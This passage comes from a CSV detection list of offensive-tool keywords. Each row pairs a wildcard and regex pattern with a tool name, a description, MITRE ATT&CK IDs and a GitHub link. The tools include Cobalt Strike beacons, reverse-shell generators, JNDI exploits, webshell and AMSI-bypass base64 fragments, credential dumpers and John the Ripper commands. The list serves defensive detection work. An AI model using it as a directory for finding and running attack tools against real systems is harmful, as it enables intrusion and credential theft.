T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*java -jar 
sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*java/jndi/LDAPRefServer.java*",".{0,1000}java\/jndi\/LDAPRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*java/jsp_shell_reverse_tcp*",".{0,1000}java\/jsp_shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*java/shell_reverse_tcp*",".{0,1000}java\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*java-deserialization-exploits*",".{0,1000}java\-deserialization\-exploits.{0,1000}","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","587","220","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z" "*javascript-obfuscator*",".{0,1000}javascript\-obfuscator.{0,1000}","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. 
containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","12787","1420","2024-04-21T22:10:06Z","2016-05-09T08:16:53Z" "*jblndlipeogpafnldhgmapagcccfchpi*",".{0,1000}jblndlipeogpafnldhgmapagcccfchpi.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*jboss_jmx_upload_exploit*",".{0,1000}jboss_jmx_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*jdk*-activator-rce-test.txt*",".{0,1000}jdk.{0,1000}\-activator\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-call-rce-test.txt*",".{0,1000}jdk.{0,1000}\-call\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - 
TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-dgc-rce-test.txt*",".{0,1000}jdk.{0,1000}\-dgc\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-method-rce-test.txt*",".{0,1000}jdk.{0,1000}\-method\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-reg-bypass.txt*",".{0,1000}jdk.{0,1000}\-reg\-bypass\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdwp-shellifier.py -t * -p * --cmd *",".{0,1000}jdwp\-shellifier\.py\s\-t\s.{0,1000}\s\-p\s.{0,1000}\s\-\-cmd\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - 
T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*jedisct1*",".{0,1000}jedisct1.{0,1000}","offensive_tool_keyword","Github Username","github username. a knack for cryptography. computer vision. opensource software and infosec. hosting infosec tools used by pentester","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/jedisct1","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*jfjallid/go-secdump*",".{0,1000}jfjallid\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw==*",".{0,1000}JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB*",".{0,1000}JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*JGillam/burp-co2*",".{0,1000}JGillam\/burp\-co2.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl*",".{0,1000}JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*Jira-Lens.py*",".{0,1000}Jira\-Lens\.py.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*jmarr73/NTLMSleuth*",".{0,1000}jmarr73\/NTLMSleuth.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*jmmcatee/cracklord*",".{0,1000}jmmcatee\/cracklord.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource 
system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*JMousqueton/PoC-CVE-2022-30190*",".{0,1000}JMousqueton\/PoC\-CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Office RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","2","157","57","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z" "*jmp_hijack_thread(*",".{0,1000}jmp_hijack_thread\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*jndi_injection.rb*",".{0,1000}jndi_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*JNDI-Injection-Exploit*",".{0,1000}JNDI\-Injection\-Exploit.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*joaoviictorti/RustRedOps*",".{0,1000}joaoviictorti\/RustRedOps.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*JOB COMPLETE: GO GET YOUR LOOT!*",".{0,1000}JOB\sCOMPLETE\:\sGO\sGET\sYOUR\sLOOT!.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*Job killed 
and console drained*",".{0,1000}Job\skilled\sand\sconsole\sdrained.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*JoelGMSec/EvilnoVNC*",".{0,1000}JoelGMSec\/EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*JoelGMSec/EvilnoVNC*",".{0,1000}JoelGMSec\/EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" 
"*JoelGMSec/Invoke-Stealth*",".{0,1000}JoelGMSec\/Invoke\-Stealth.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*JoelGMSec/PSRansom*",".{0,1000}JoelGMSec\/PSRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*Joey is the best hacker in Hackers*",".{0,1000}Joey\sis\sthe\sbest\shacker\sin\sHackers.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*john * --incremental*",".{0,1000}john\s.{0,1000}\s\-\-incremental.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john * -w=*",".{0,1000}john\s.{0,1000}\s\-w\=.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john * --wordlist=*",".{0,1000}john\s.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-groups*",".{0,1000}john\s.{0,1000}\-groups.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *htdigest*",".{0,1000}john\s.{0,1000}htdigest.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-inc *",".{0,1000}john\s.{0,1000}\-inc\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-incremental *",".{0,1000}john\s.{0,1000}\-incremental\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-shells*",".{0,1000}john\s.{0,1000}\-shells.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 
cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-show*",".{0,1000}john\s.{0,1000}\-show.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-single*",".{0,1000}john\s.{0,1000}\-single.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-users*",".{0,1000}john\s.{0,1000}\-users.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-wordlist*",".{0,1000}john\s.{0,1000}\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *--wordlist*",".{0,1000}john\s.{0,1000}\-\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --format=*",".{0,1000}john\s\-\-format\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*john hashes*",".{0,1000}john\shashes.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john NTDS.dit*",".{0,1000}john\sNTDS\.dit.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --show *",".{0,1000}john\s\-\-show\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --status*",".{0,1000}john\s\-\-status.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*John the Ripper*",".{0,1000}John\sthe\sRipper.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john 
--wordlist*",".{0,1000}john\s\-\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john --wordlist=*",".{0,1000}john\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*John*the*Ripper*",".{0,1000}John.{0,1000}the.{0,1000}Ripper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john.bash_completion*",".{0,1000}john\.bash_completion.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john.session.log*",".{0,1000}john\.session\.log.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john.zsh_completion*",".{0,1000}john\.zsh_completion.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
